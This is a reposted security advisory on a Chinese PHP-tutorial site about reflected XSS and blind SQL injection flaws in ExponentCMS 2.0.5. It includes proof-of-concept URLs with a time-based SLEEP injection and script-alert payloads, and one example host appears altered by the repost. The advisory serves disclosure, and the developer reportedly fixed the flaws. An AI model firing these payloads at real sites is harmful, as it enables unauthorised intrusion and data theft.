网站地图    收藏   

主页 > 后端 > 网站安全 >

ExponentCMS 2.0.5多个缺陷及修复 - 网站安全 - 自学

来源:自学PHP网    时间:2015-04-17 13:02 作者: 阅读:

[导读] 信息--------------------名称 : XSS and Blind SQL Injection Vulnerabilities in ExponentCMS影像软件 : ExponentCMS 2.0.5 and possibly below.开发网站: http://www.exponentcms.org缺陷类型......

信息
--------------------
名称 :  XSS and Blind SQL Injection Vulnerabilities in ExponentCMS
影像软件 :  ExponentCMS 2.0.5 and possibly below.
开发网站:  http://www.exponentcms.org
缺陷类型 :  Cross-Site Scripting and SQL Injection
安全级别 :  Critical
Researcher :  Onur Yılmaz
描述
--------------------
Exponent is a website content management system (or CMS) that allows
site owners to easily create and manage dynamic websites without
necessarily directly coding web pages, or managing site navigation.
 
日记
--------------------
Exponent CMS 2.0.5版有xss缺陷
 
Example PoC urls are as follows :
http://www.2cto.com /index.php?section=(SELECT%201%20FROM%20(SELECT%20SLEEP(25))A)
http://example.com/index.php?action=showall_by_tags&tag=%27%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Ealert(1337)%3C/script%3E&controller=news&src=
 () random4e5433b85bb1f
http://example.com/index.php?controller=expTag&action=show&title=changes&src=%27%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Ealert(1337)%3C/script%3E
 
You can read the full article about Cross-Site Scripting and SQL
Injection vulnerabilities from here :
http://www.mavitunasecurity.com/crosssite-scripting-xss/
http://www.mavitunasecurity.com/sql-injection/
 
解决方案
--------------------
开发者已经在新版里修复了这些问题
 

自学PHP网专注网站建设学习,PHP程序学习,平面设计学习,以及操作系统学习

京ICP备14009008号-1@版权所有www.zixuephp.com

网站声明:本站所有视频,教程都由网友上传,站长收集和分享给大家学习使用,如由牵扯版权问题请联系站长邮箱904561283@qq.com

添加评论